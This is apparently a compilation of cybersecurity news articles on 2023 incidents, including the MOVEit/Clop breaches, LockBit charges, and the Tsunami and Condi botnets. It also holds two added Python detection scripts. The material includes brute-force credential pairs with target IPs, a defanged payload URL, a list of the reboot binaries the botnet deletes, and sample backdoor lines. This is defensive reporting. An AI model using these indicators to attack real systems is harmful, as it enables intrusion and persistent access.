The good news is that Progress Software is not aware of attacks in the wild exploiting these vulnerabilities.
Recently another MOVEit software vulnerability, tracked as CVE-2023-34362, made the headlines.
The vulnerability is a SQL injection vulnerability, it can be exploited by an unauthenticated attacker to gain unauthorized access to MOVEit Transfer’s database.
The Clop ransomware gang claims to have hacked hundreds of companies by exploiting the above issue.
Kroll researchers discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit software since 2021.
At the time of this writing, the Clop ransomware group already added 27 companies to the list of victims on its dark web leak site. The group claimed to have compromised the companies by exploiting the zero-day CVE-2023-34362.
The group published the following message on its leak site to clarify the theft of data from government agencies reported by some media:
“WE GOT A LOT OF EMAILS ABOUT GOVERNMENT DATA, WE DON’T HAVE ANY GOVERNMENT DATA AND ANYTHING DIRECTLY RESIDING ON EXPOSED AND BAD PROTECTED NOT ENCRYPTED FILE TRANSFER WE STILL DO THE POLITE THING AND DELETE ALL. ALL MEDIA SPEAKING ABOUT THIS ARE DO WHAT ALWAYS THEY DO. PROVIDE LITTLE TRUTH IN A BIG LIE. WE ALSO WANT TO REMIND ALL COMPANY THAT IF YOU PUT DATA ON INTERNET WHERE DATA IS NOT PROTECT DO NOT BLAME US FOR PENETRATION TESTING SERVICE. WE ARE ONLY FINANCIAL MOTIVATED AND DO NOT CARE ANYTHING ABOUT POLITICS.”
British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group.
Oil and Gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign conducted by the Clop gang exploiting a MOVEit zero-day vulnerability.
Threat actors are actively exploiting the zero-day vulnerability, tracked as CVE-2023-34362, to steal data from organizations worldwide.
The company is investigating the security breach and said that, at this time, the attack has had no impact on its core IT systems.
“We are aware of a cyber security incident that has impacted a third-party tool from Progress called MOVEit Transfer, which is used by a small number of Shell employees and customers,” said Shell US spokesperson Anna Arata in a statement. “There is no evidence of impact to Shell’s core IT systems,” Arata added. “Our IT teams are investigating to understand and manage any risks, and take appropriate action,” she said.
By May 31, Rapid7 experts discovered approximately 2,500 instances of MOVEit Transfer publicly accessible on the internet, with a significant portion located in the United States. At this time the number of installs located in the UK is 127.
The UK’s communications regulator Ofcom is another victim of the ongoing ransomware campaign conducted by the Clop group. Another data breach that recently made the headlines is the hack of the payroll services provider Zellis.
The instance of MOVEit Transfer managed by the payroll processor Zellis was used by the company to exchange files with dozens of companies, which means that the number of impacted firms could be significant.
As a result of the cyber attack on the payroll provider Zellis, the personal data of employees at the BBC and British Airways has been compromised and exposed.
One of Zellis’s customers, the British health and beauty retailer and pharmacy chain Boots, also confirmed that it was impacted by the attack. Another firm impacted by the data breach is the airline Aer Lingus, which confirmed that “some of our current and former employee data” has been disclosed.
In March 2021, Shell disclosed another data breach resulting from the compromise of an Accellion File Transfer Appliance (FTA) used by the company.
DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses.
The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous LockBit ransomware attacks against systems in the United States, Asia, Europe, and Africa. The US authorities arrested the man in Arizona last month.
DoJ states that from at least as early as August 2020 to March 2023, Astamirov and other members of the LockBit ransomware gang committed wire fraud, compromised many computer systems worldwide, and attempted to extort the victims of the ransomware attacks.
US authorities believe that Astamirov conducted at least five attacks against victim computer systems in the United States and abroad.
Astamirov controlled multiple email addresses, IP addresses, and other online provider accounts that were employed in LockBit ransomware attacks. In at least one attack, the authorities were able to trace a portion of a ransom payment to a wallet under the control of Astamirov.
“This LockBit-related arrest, the second in six months, underscores the Justice Department’s unwavering commitment to hold ransomware actors accountable,” said Deputy Attorney General Lisa O. Monaco. “In securing the arrest of a second Russian national affiliated with the LockBit ransomware, the Department has once again demonstrated the long arm of the law. We will continue to use every tool at our disposal to disrupt cybercrime, and while cybercriminals may continue to run, they ultimately cannot hide.”
If convicted, Astamirov faces a maximum penalty of 20 years in prison on the charge of conspiring to commit wire fraud and a maximum penalty of five years in prison on the charge of conspiring to intentionally damage protected computers and to transmit ransom demands. Both charges can also be punished by a maximum fine of either $250,000 or twice the gain or loss from the offense, whichever is greater.
In November 2022, the U.S. Department of Justice (DoJ) charged Mikhail Vasiliev, a dual Russian and Canadian national, for his alleged participation in the LockBit ransomware operation.
The man is currently in custody in Canada and is awaiting extradition to the United States.
In May, the US Justice Department charged Russian national Mikhail Pavlovich Matveev (30), aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar, for his alleged role in multiple ransomware attacks.
The DoJ unsealed two indictments charging the man with using three different ransomware families in attacks aimed at numerous victims throughout the United States. The attacks hit law enforcement agencies in Washington, D.C. and New Jersey, as well as organizations in the healthcare and other sectors nationwide.
On or about June 25, 2020, Matveev and his LockBit co-conspirators targeted a law enforcement agency in Passaic County, New Jersey. On or about May 27, 2022, the man and his Hive co-conspirators allegedly hit a nonprofit behavioral healthcare organization in New Jersey. On April 26, 2021, Matveev and his Babuk co-conspirators hit the Metropolitan Police Department in Washington, D.C.
The Russian citizen has been charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers. If convicted, the man could face a sentence of over 20 years in prison.
The man is believed to be living in Russia and operating from that country. Clearly, due to the ongoing geopolitical crisis, it is unlikely that Russia will capture the man and extradite him to the United States.
According to a joint advisory published by cybersecurity agencies, the LockBit ransomware group has successfully extorted roughly $91 million in about 1,700 attacks against U.S. organizations since 2020.
The LockBit ransomware operation was the most active in 2022 and, according to the researchers, it is one of the most prolific RaaS operations in 2023. The operation targeted many organizations in critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The advisory highlights that, due to the large number of unconnected affiliates in the RaaS, the TTPs observed in LockBit ransomware attacks vary significantly.
LockBit was responsible for 18% of the total reported Australian ransomware incidents from April 1, 2022, to March 31, 2023.
16% of the State, Local, Tribal, and Territorial (SLTT) government ransomware incidents reported to the MS-ISAC in 2022 were LockBit attacks. The group targeted municipal governments, county governments, public higher education and K-12 schools, and emergency services (e.g., law enforcement).
Polish police, as part of the international law enforcement operation PowerOFF, dismantled a DDoS-for-hire service that has been active since at least 2013.
An international operation codenamed PowerOff led to the shutdown of a DDoS-for-hire service that has been active since at least 2013. The operation was conducted by the Polish Central Bureau for Combating Cybercrime with the support of Europol, the FBI, and law enforcement agencies from the Netherlands, Germany, and Belgium, and the Joint Cybercrime Action Taskforce (J-CAT).
DDoS-for-hire or ‘booter’ services allow registered users to order DDoS attacks without any specific technical knowledge.
Bleeping Computer reported that the Polish police arrested two individuals running the DDoS-for-hire services and collected data from a server in Switzerland used by the perpetrators.
The police carried out 10 searches and seized various electronic equipment, including hard drives, 5 desktop computers and 6 portable computers, 10 telephones, 5 USB sticks and 3 SIM cards, a printout of a cryptocurrency wallet with a private key holding 1 BTC and 1 BCH worth over PLN 114,000, and cash amounting to over PLN 145,000. The total value of the secured property is almost PLN 260,000 (more than $63,690).
The researchers at Vx-underground published a video that shows the arrest of the suspects and the searches conducted by the Polish police.
Here is the full video of the Polish CBZC (Central Bureau for Combating Cybercrime) arresting individuals associated with DDoS as a Service providers.
The police discovered that more than 35,000 user accounts were registered to the services; the analysis of the server revealed 76,000 login records and more than 320,000 unique IP addresses linked to the DDoS-for-hire service.
The police also collected evidence of attacks paid for by the customers, who paid a total of hundreds of thousands of dollars to the platform.
“In the proceedings, data was obtained from the perpetrators’ server located in Switzerland. More than 35,000 user accounts, 76,000 log-in records to the platform and over 320,000 unique IP addresses of the attacked servers have been established. In addition, 11,000 records of purchased “plans” of attack along with the email address of the buyer of the service (for the total amount of approximately $400,000), and over a thousand records of purchased “plans” of attacks (for the total amount of approximately $44,000).” reads the press release published by the Polish police.
In early May, the U.S. Justice Department announced the seizure of 13 domains linked to DDoS-for-hire services as part of a coordinated international law enforcement effort known as Operation PowerOFF.
The authorities pointed out that ten of the 13 domains seized as part of Operation PowerOFF are reincarnations of booters that were seized in December. In December 2022, the FBI seized 48 domains linked to DDoS-for-Hire service platforms as part of the same Operation PowerOFF.
The U.S. government announced up to a $10 million bounty for information linking the Clop ransomware gang to a foreign government.
The US government is offering up to a $10 million bounty for information linking the CL0P Ransomware Gang, or any other threat actors targeting U.S. critical infrastructure, to a foreign government.
The bounty is covered by the U.S. State Department’s Rewards for Justice program.
The U.S. State Department’s Rewards for Justice (RFJ) program is a government counterterrorism rewards program that offers monetary rewards for information leading to the prevention, disruption, or conviction of individuals involved in acts against U.S. interests.
The US government offers rewards for information that leads to the arrest, conviction, or location of threat actors.
The Clop ransomware group recently claimed to have hacked hundreds of companies globally by exploiting a MOVEit Transfer vulnerability.
MOVEit Transfer is a managed file transfer solution that is used by enterprises to securely transfer files using SFTP, SCP, and HTTP-based uploads.
The vulnerability is a SQL injection issue; it can be exploited by an unauthenticated attacker to gain unauthorized access to MOVEit Transfer’s database.
The ransomware gang published an extortion note on its dark web leak site claiming to have information on hundreds of businesses.
“WE HAVE INFORMATION ON HUNDREDS OF COMPANIES SO OUR DISCUSSION WILL WORK VERY SIMPLE.” reads the message published by the gang.
The gang urged victim organizations to contact them before their names are added to the list of victims on the leak site. The group set June 14 as the deadline.
At this time it is not possible to determine the exact number of organizations that were breached by the gang by exploiting the MOVEit Transfer vulnerability.
By May 31, Rapid7 experts discovered approximately 2,500 instances of MOVEit Transfer publicly accessible on the internet, with a significant portion located in the United States.
“Our teams have so far observed the same webshell name in multiple customer environments, which may indicate automated exploitation.” reported Rapid7.
Kroll researchers discovered that the Clop ransomware gang had been looking for a zero-day exploit in the MOVEit software since 2021.
At the time of this writing, the Clop ransomware group already added 27 companies to the list of victims on its dark web leak site. The group claimed to have compromised the companies by exploiting the zero-day CVE-2023-34362.
According to a report published by CNN, the group has breached numerous federal agencies, including The Department of Energy.
After the publication of the report, the group published the following message on its leak site to clarify the theft of data from government agencies reported by some media:
“WE GOT A LOT OF EMAILS ABOUT GOVERNMENT DATA, WE DON’T HAVE ANY GOVERNMENT DATA AND ANYTHING DIRECTLY RESIDING ON EXPOSED AND BAD PROTECTED NOT ENCRYPTED FILE TRANSFER WE STILL DO THE POLITE THING AND DELETE ALL. ALL MEDIA SPEAKING ABOUT THIS ARE DO WHAT ALWAYS THEY DO. PROVIDE LITTLE TRUTH IN A BIG LIE. WE ALSO WANT TO REMIND ALL COMPANY THAT IF YOU PUT DATA ON INTERNET WHERE DATA IS NOT PROTECT DO NOT BLAME US FOR PENETRATION TESTING SERVICE. WE ARE ONLY FINANCIAL MOTIVATED AND DO NOT CARE ANYTHING ABOUT POLITICS.”
The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit in the February cyberattack.
In February, the social news aggregation platform Reddit suffered a security breach in which attackers gained unauthorized access to internal documents, code, and some business systems.
The company announced it was hit by a sophisticated and highly-targeted attack that took place on February 5, 2023. A highly-targeted phishing attack hit the employees of the company. The company pointed out that Reddit user passwords and accounts were not compromised.
The spear-phishing messages redirected users to a website mimicking the company’s intranet gateway; the landing page was designed to trick victims into providing credentials and second-factor tokens.
“On late (PST) February 5, 2023, we became aware of a sophisticated phishing campaign that targeted Reddit employees. As in most phishing campaigns, the attacker sent out plausible-sounding prompts pointing employees to a website that cloned the behavior of our intranet gateway, in an attempt to steal credentials and second-factor tokens.” reads a notice published by the company.
Once they obtained a single employee’s credentials, the threat actors gained access to some internal docs and code, as well as some internal dashboards and business systems. The primary production systems of the company were not compromised.
“Exposure included limited contact information for (currently hundreds of) company contacts and employees (current and former), as well as limited advertiser information.” continues the notice. “Based on several days of initial investigation by security, engineering, and data science (and friends!), we have no evidence to suggest that any of your non-public data has been accessed, or that Reddit’s information has been published or distributed online.”
The company states that the phished employee self-reported the incident and that it launched an internal investigation to determine the extent of the breach. The Security team responded quickly to the incident by locking out the intruders.
Now the BlackCat/ALPHV ransomware gang claimed responsibility for the February cyberattack on the company. The cybercrime gang claims to have stolen 80GB of data (zipped) from Reddit. The group attempted to contact Reddit twice, on April 13 and June 16, without success.
“Operators broke into Reddit on February 5, 2023, and took 80 gigabytes (zipped) of data. Reddit was emailed twice by operators, once on April 13 and once again on June 16. There was no attempt to find out what we took.” reads the message published by the ransomware group on its Tor data leak site. “This is again another instance of Steve Huffman undermining his own agenda. He makes an effort to appear tough, but we are all aware of what happens to individuals like him when businesses go public. such as Adam Neumann of WeWork. I told them in my first email that I would wait for their IPO to come along. But this seems like the perfect opportunity! We are very confident that Reddit will not pay any money for their data. But I am very happy to know that the public will be able to read about all the statistics they track about their users and all the interesting confidential data we took.”
BlackCat/Alphv group is demanding $4.5 million to delete the stolen data.
“Did you know they also silently censor users? Along with artifacts from their GitHub! In our last email to them, we stated that we wanted $4.5 million in exchange for the deletion of the data and our silence. As we also stated, if we had to make this public, then we now demand that they also withdraw their API pricing changes along with our money or we will leak it.” continues the message. “We expect to leak the data. Pass on the torch, Spez, you’re no longer cut out for this kind of work.”
Microsoft confirmed that the recent outages to the Azure, Outlook, and OneDrive services were caused by cyber attacks.
In early June, Microsoft suffered severe outages for some of its services, including Outlook email, OneDrive file-sharing apps, and the cloud computing infrastructure Azure.
A collective known as Anonymous Sudan (aka Storm-1359) claimed responsibility for the DDoS attacks that hit the company’s services.
Threat actors relied on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools.
Initially, the IT giant did not provide details about the outage, but now it has confirmed it was targeted by DDoS attacks in a report titled “Microsoft Response to Layer 7 Distributed Denial of Service (DDoS) Attacks.”
“Beginning in early June 2023, Microsoft identified surges in traffic against some services that temporarily impacted availability. Microsoft promptly opened an investigation and subsequently began tracking ongoing DDoS activity by the threat actor that Microsoft tracks as Storm-1359.” reads the report published by the company.
The attackers launched a series of powerful Layer 7 Distributed Denial of Service (DDoS) attacks.
The company pointed out that it has seen no evidence that customer data has been accessed or compromised. Microsoft enhanced its layer 7 protections, including tuning Azure Web Application Firewall (WAF), to mitigate these types of attacks.
The company observed Anonymous Sudan launching several layer 7 DDoS attack traffic types, including HTTP(S) flood attacks, cache bypass, and Slowloris.
The report published by Microsoft also includes Layer 7 DDoS protection tips.
The Anonymous Sudan collective has been active since January 2023 and claims to target any country that is against Sudan. However, some security researchers believe that Anonymous Sudan is a sub-group of the pro-Russian threat group Killnet.
“SpiderLabs cannot confirm that the group is based in Sudan, nor if any of its members are from that nation, but based on the evidence available, it seems quite likely that Anonymous Sudan is a Killnet project, possibly including some Eastern European members.” states SpiderLabs.
Zyxel released security updates to address a critical vulnerability affecting its network-attached storage (NAS) devices.
Zyxel released security updates to address a critical security flaw, tracked as CVE-2023-27992 (CVSS score: 9.8), affecting its network-attached storage (NAS) devices.
The vulnerability is a pre-authentication command injection issue that impacts the Zyxel NAS326 firmware versions prior to V5.21(AAZF.14)C0, NAS540 firmware versions prior to V5.21(AATB.11)C0, and NAS542 firmware versions prior to V5.21(ABAG.11)C0. A remote, unauthenticated attacker can exploit the vulnerability to execute some operating system (OS) commands by sending a specially crafted HTTP request.
“Zyxel has released patches addressing a pre-authentication command injection vulnerability in some NAS versions.” reads the advisory published by Zyxel. “The pre-authentication command injection vulnerability in some Zyxel NAS devices could allow an unauthenticated attacker to execute some operating system (OS) commands remotely by sending a crafted HTTP request.”
The vulnerability was reported by Andrej Zaujec, NCSC-FI, and Maxim Suslov.
Threat actors are actively attempting to exploit the command injection vulnerability CVE-2023-28771 impacting Zyxel firewalls. Their objective is to leverage this vulnerability to deploy and install malware on the affected systems. US CISA added the vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation.
In late April, Zyxel addressed the critical vulnerability CVE-2023-28771 (CVSS score 9.8) in its firewall devices. The company promptly advised customers to install the provided patches in order to mitigate the vulnerability.
The vulnerability is being actively exploited to recruit vulnerable devices into a Mirai-like botnet.
The other two issues, tracked as CVE-2023-33009 and CVE-2023-33010, are critical buffer overflow vulnerabilities. A remote, unauthenticated attacker can trigger the flaws to cause a denial-of-service (DoS) condition and achieve remote code execution on vulnerable devices.
The company states that devices under attack become unresponsive and that their Web GUI or SSH management interface is no longer reachable.
Researchers warn of an ongoing Tsunami DDoS botnet campaign targeting inadequately protected Linux SSH servers.
Researchers from AhnLab Security Emergency response Center (ASEC) have uncovered an ongoing hacking campaign, aimed at poorly protected Linux SSH servers, to install the Tsunami DDoS botnet (aka Kaiten). The threat actors behind these attacks were also observed installing other malware families, including ShellBot, XMRig CoinMiner, and Log Cleaner.
The Tsunami DDoS botnet operates as an IRC bot and relies on IRC for C2 communication.
The researchers pointed out that the source code of the Tsunami bot is publicly available, allowing multiple threat actors to create their own botnets. The bot primarily targets IoT devices along with Linux servers through brute force attacks.
The following table lists the ID and password values used by the bot in its dictionary attacks, along with the IP address of the attack target.

ID        Password    Attack Target
admin     qwe123Q#    124.160.40[.]48
sxit      sxit        124.160.40[.]94
root      abcdefghi   124.160.40[.]94
root      123@abc     124.160.40[.]94
weblogic  123         124.160.40[.]94
rpcuser   rpcuser     124.160.40[.]94
test      p@ssw0rd    124.160.40[.]94
nologin   nologin     124.160.40[.]94
Hadoop    p@ssw0rd    124.160.40[.]94
hxw       test123     124.160.40[.]94
backlog   backlog     124.160.40[.]94
dell      123         124.160.40[.]94
Upon successfully logging in, the attackers execute a command to download and run various malware.
The downloader-type Bash script is used to install additional malware and perform various preliminary tasks to take control of infected systems, including the creation of a backdoor SSH account.
Threat actors also generated a new pair of public/private SSH keys for the compromised server to achieve persistent access, even if the user password was changed.
The variant of the Tsunami bot employed in this campaign is a Kaiten variant known as Ziggy, which maintains persistence by writing itself to the “/etc/rc.local” file.
In order to avoid detection, the bot attempts to change the name of its running process to “[kworker/0:0]”. By doing so, the malware blends in with normal kernel thread names, making it difficult for users to notice.
The Tsunami botnet supports multiple DDoS attack techniques, including SYN, ACK, UDP, and various flood DDoS methods.
Tsunami also supports multiple commands, including collecting system information, executing shell commands, establishing reverse shells, updating itself, downloading additional payloads, and killing itself.
The attackers also use a privilege escalation malware: an ELF binary that sets the user ID and group ID to those of the root account before executing a shell.
“Attack campaigns on poorly managed Linux SSH servers have been occurring persistently for quite some time. The threat actor installed XMRig CoinMiner alongside DDoS bots like Tsunami and ShellBot on infected systems.” concludes the report. “Administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks and update to the latest patch to prevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from outside to restrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.”
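As an added defensive example (not ASEC's code), the following Python script checks a Linux host for the three Tsunami/Ziggy indicators described above: a launcher line added to /etc/rc.local, a user-space process masquerading as “[kworker/0:0]” while not being a child of kthreadd, and an SSH public key that is absent from the administrator's approved inventory. All inputs shown are constructed samples; the file paths, process IDs and key blobs are assumptions, and the approved-key set is a stand-in for a real inventory.

```python
#!/usr/bin/env python3
"""Host checks for the Tsunami (Kaiten/Ziggy) persistence and evasion
indicators described in the ASEC write-up. Added example, not ASEC's code;
every sample input below is constructed, not a real capture."""
import re
from typing import Dict, List, Set

KTHREADD_PID = 2  # every genuine kernel thread is a child of kthreadd (PID 2)


def rc_local_commands(text: str) -> List[str]:
    """Return the command lines found in an /etc/rc.local body.

    A stock rc.local holds only a shebang, comments and 'exit 0'; anything
    else is a boot-time launcher the analyst must be able to account for.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.fullmatch(r"exit(\s+\d+)?", line):
            continue
        findings.append(line)
    return findings


def fake_kernel_threads(ps_output: str) -> List[Dict[str, str]]:
    """Flag processes that look like kworker threads but are not kernel threads.

    Expects the output of:  ps -eo pid,ppid,user,comm
    A real kworker has PPID 2, runs as root and has no brackets in comm; a bot
    that renamed itself via prctl()/argv shows a normal parent, a non-root
    user, or the literal string "[kworker/0:0]" as its name.
    """
    suspicious = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, ppid, user, comm = parts
        if "kworker" not in comm:
            continue
        if int(ppid) != KTHREADD_PID or comm.startswith("[") or user != "root":
            suspicious.append({"pid": pid, "ppid": ppid, "user": user, "comm": comm})
    return suspicious


def unexpected_authorized_keys(text: str, approved: Set[str]) -> List[str]:
    """Return authorized_keys lines whose 'type blob' pair is not approved.

    The report notes the actor adds a fresh key pair so that access survives a
    password change; comparing against an inventory of approved public keys
    catches that regardless of the comment field. Leading option fields such as
    no-pty are skipped (options containing spaces are not handled here).
    """
    unexpected = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        for i, field in enumerate(fields):
            if field.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(fields):
                if f"{field} {fields[i + 1]}" not in approved:
                    unexpected.append(line)
                break
    return unexpected


# Constructed sample inputs (assumed paths, PIDs and key blobs, not real data).
SAMPLE_RC_LOCAL = """#!/bin/sh -e
# rc.local - executed at the end of each multiuser runlevel
/tmp/.shm/.bot > /dev/null 2>&1 &
exit 0
"""

SAMPLE_PS = """  PID  PPID USER     COMMAND
    1     0 root     systemd
    2     0 root     kthreadd
   15     2 root     kworker/0:0
 4242   901 root     [kworker/0:0]
 4243   901 nobody   kworker/u8:1
"""

APPROVED_KEYS = {"ssh-ed25519 AAAAC3_constructed_admin_key"}
SAMPLE_AUTH_KEYS = """ssh-ed25519 AAAAC3_constructed_admin_key admin@jumphost
no-pty,command="/bin/sh" ssh-rsa AAAAB3_constructed_backdoor_key
"""


def run_checks() -> Dict[str, list]:
    """Run all three checks over the constructed samples."""
    return {
        "rc_local": rc_local_commands(SAMPLE_RC_LOCAL),
        "fake_kworkers": fake_kernel_threads(SAMPLE_PS),
        "unexpected_keys": unexpected_authorized_keys(SAMPLE_AUTH_KEYS, APPROVED_KEYS),
    }


if __name__ == "__main__":
    for name, hits in run_checks().items():
        print(f"{name}: {hits}")
```

On a live host, feed the functions the real /etc/rc.local, the output of `ps -eo pid,ppid,user,comm`, and each account's authorized_keys file instead of the constructed samples.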
A third-party vendor of 3CX, a popular Voice over Internet Protocol (VoIP) comms provider, left an open server and exposed sensitive 3CX data.
The issue went under the company’s radar, even though it was recently targeted by North Korean hackers.
While victims of cyberattacks should not be ridiculed, there’s a reason that sayings like “fool me once, shame on you; fool me twice, shame on me” resonate so well.
Earlier this year, suspected North Korean hackers exploited 3CX for supply-chain attacks, spreading malware to devices using the company’s software.
Despite this prior experience with data breaches, the Cybernews research team recently discovered open Elasticsearch (distributed search and analytics engine) and Kibana (data visualization and exploration tool) instances belonging to a third-party vendor of 3CX. The instances, containing sensitive 3CX data, were discovered on May 15th, nearly two months after the initial attacks became public knowledge.
“The finding suggests that the way 3CX deals with cyberattacks is insufficient since exposed instances were not detected. Meanwhile, skilled attackers could use the data to get back into 3CX networks,” Cybernews researchers said.
We reached out to 3CX for comment but did not receive a reply before publishing this article.
What 3CX data was exposed?
The exposed instances, which the company closed after we contacted them, contained information attackers could have used to spy on 3CX clients or make preparations for larger, more sophisticated attacks. The open instances exposed:
Call metadata, including time, state, duration, phone number, and email
License keys
Encoded database strings
Attackers can leverage call metadata to develop an intimate picture of the callers’ behavior, deducing who called who and for how long. Additional information could allow them to conclude what was discussed during the calls.
“Moreover, the call metadata can reveal internal company information or even the health of an organization. For example, if there are many sporadic calls, that could signify panic,” Cybernews researchers said.
Meanwhile, exposing software license keys presents a different set of problems. Since they ensure that software is obtained legitimately, attackers can use exposed keys to use 3CX software without paying for it.
In some cases, activating software allows the user to sync data between devices. That way, attackers could access user data simply by installing the software and using a legitimate license key.
However, according to the team, exposing database connection strings poses the biggest danger. Connection strings serve as a set of directions for a program to find the database. Typically, they tell the program where the database is, its type, and how to access it.
“Exposed database connection strings can be exploited in several ways. For example, attackers could use the leaked data to connect to the resource without permission and proceed to read, copy, modify, or delete data stored within that resource,” the team said.
3CX’s safety measures
3CX was recently the victim of a cascading supply chain attack. Researchers at cybersecurity company Mandiant concluded that attackers first distributed malware via software from Trading Technologies, which then affected 3CX software.
Even though the company had to evaluate its security posture, the exposed Kibana and Elasticsearch instances went under the radar. According to the team, the exposed data was accessible since March 30th, 2022, months before the supply chain attack occurred.
Interestingly, after 3CX dealt with the cascading supply chain attack, it released a seven-step security action plan that discussed crucial steps to avoid similar leaks, such as a need to harden its network security, perform pen testing, and set up a new department for network operations and security.
“While taking these steps would contribute to enhanced security, they are either not yet effective or were not followed thoroughly, leaving the company vulnerable,” the team said.
If you want to know more about the disclosure process, take a look at the original post:
VMware is warning customers that critical remote code execution vulnerability CVE-2023-20887 is being actively exploited in attacks.
VMware is warning customers that a critical remote code execution vulnerability in Aria Operations for Networks (formerly vRealize Network Insight), tracked as CVE-2023-20887, is being actively exploited in the wild.
“VMware has confirmed that exploitation of CVE-2023-20887 has occurred in the wild,” reads the advisory.
In early June, Virtualization technology giant VMware released security patches to address three critical and high-severity vulnerabilities, including the flaw CVE-2023-20887.
VMware Aria Operations for Networks (formerly vRealize Network Insight) is a network monitoring tool that helps organizations build an optimized, highly available, and secure network infrastructure.
The vulnerability CVE-2023-20887 (CVSSv3 score of 9.8), a command injection flaw, is the most severe issue addressed by the company.
“A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in remote code execution.” reads the advisory published by VMware.
GreyNoise CEO Andrew Morris confirmed that the flaw is actively exploited in the wild.
Researchers discovered a new strain of malware called Condi that targets TP-Link Archer AX21 (AX1800) Wi-Fi routers.
Fortinet FortiGuard Labs researchers discovered a new strain of malware called Condi that was observed exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers.
“FortiGuard Labs encountered recent samples of a DDoS-as-a-service botnet calling itself Condi. It attempted to spread by exploiting TP-Link Archer AX21 (AX1800) routers vulnerable to CVE-2023-1389, which was disclosed in mid-March of this year.” reads the report published by Fortinet. “We have additionally observed an increasing number of Condi samples collected from our monitoring systems since the end of May 2023, indicating an active attempt to expand the botnet.”
The CVE-2023-1389 flaw exploited by the bot is a command injection vulnerability. An unauthenticated attacker can trigger the issue to inject commands, which run as root, by sending a simple POST request.
The malware compromises the devices to build a distributed denial-of-service (DDoS) botnet.
The researchers observed a surge in attacks in May 2023.
The threat actor behind the botnet, zxcr9999, advertises its malware on a Telegram channel named Condì Network. The channel was created in May 2022 and the threat actor is using it to offer a DDoS-for-hire service through the botnet and is also offering the source code of the bot for sale.
The bot supports anti-analysis functionalities and is also able to kill processes associated with competing botnets.
The bot propagates using an embedded simple scanner borrowed from Mirai’s original Telnet scanner to scan for any public IPs with open ports 80 or 8080 (commonly used for HTTP servers) and then sends a hardcoded exploitation request. The request allows the bot to download and execute a remote shell script at hxxp://cdn2[.]duc3k[.]com/t which deploys the Condi sample on vulnerable TP-Link Archer AX21 devices.
The sample analyzed by Fortinet only contained the scanner for CVE-2023-1389, however, experts explained that other Condi samples were also spotted exploiting other vulnerabilities to propagate.
The bot does not survive a system restart, so the author implemented a keep-alive feature that prevents reboots. The mechanism works by deleting multiple binaries that are used to shut down or reboot the system:
/usr/sbin/reboot
/usr/bin/reboot
/usr/sbin/shutdown
/usr/bin/shutdown
/usr/sbin/poweroff
/usr/bin/poweroff
/usr/sbin/halt
/usr/bin/halt
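Because the deletion above is the bot's only answer to a reboot, a missing set of these binaries is a useful forensic indicator. The check below is added here as an example (not Fortinet's code; only the path list comes from the report). Presence alone is a weak signal, since many embedded firmwares ship these commands only under /sbin or as BusyBox symlinks, so the check diffs a suspect dump against a pristine firmware image of the same model, which is assumed to be available (for instance extracted from the vendor download). The two directory trees it builds are constructed stand-ins for that image and that dump.

```python
"""Compare a suspect router filesystem against a known-good one for the
reboot/shutdown binaries Condi deletes to keep the device from restarting.

Added example, not code from Fortinet's report: the path list is the report's,
the comparison is ours. `build_demo_roots` fabricates both trees so the check
runs offline.
"""
import os
import tempfile

# Binaries the Condi sample deletes (from the Fortinet report).
CONDI_DELETED_BINARIES = [
    "/usr/sbin/reboot", "/usr/bin/reboot",
    "/usr/sbin/shutdown", "/usr/bin/shutdown",
    "/usr/sbin/poweroff", "/usr/bin/poweroff",
    "/usr/sbin/halt", "/usr/bin/halt",
]


def _under(root, abs_path):
    """Map an absolute device path onto a mounted image or dump directory."""
    return os.path.join(root, abs_path.lstrip("/"))


def present_binaries(root):
    """Paths from the list that exist under root (symlinks count, even dangling)."""
    return [p for p in CONDI_DELETED_BINARIES if os.path.lexists(_under(root, p))]


def deleted_vs_baseline(baseline_root, suspect_root):
    """Paths present in the clean image but missing from the suspect dump, in list order."""
    baseline = present_binaries(baseline_root)
    missing = set(baseline) - set(present_binaries(suspect_root))
    return [p for p in baseline if p in missing]


def build_demo_roots():
    """Constructed demo: a 'firmware' tree with BusyBox-style symlinks and a
    'dump' of the same tree after Condi's keep-alive step has run."""
    firmware = tempfile.mkdtemp(prefix="fw_")
    dump = tempfile.mkdtemp(prefix="dump_")
    for root in (firmware, dump):
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "busybox"), "wb") as f:
            f.write(b"\x7fELF")  # placeholder bytes, not a real binary
        for p in CONDI_DELETED_BINARIES:
            os.makedirs(os.path.dirname(_under(root, p)), exist_ok=True)
            os.symlink("/bin/busybox", _under(root, p))
    # Condi's keep-alive step: unlink every reboot/shutdown/poweroff/halt path.
    for p in CONDI_DELETED_BINARIES:
        os.unlink(_under(dump, p))
    return firmware, dump


if __name__ == "__main__":
    fw, dump = build_demo_roots()
    for p in deleted_vs_baseline(fw, dump):
        print("deleted:", p)
```

On a live device the same comparison can be run by mounting the vendor image read-only and passing `/` as the suspect root; a non-empty result on an otherwise untouched router is worth a closer look at running processes and outbound connections.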
The C2 communication relies on a binary protocol that is a modified version of that initially implemented in the Mirai botnet.
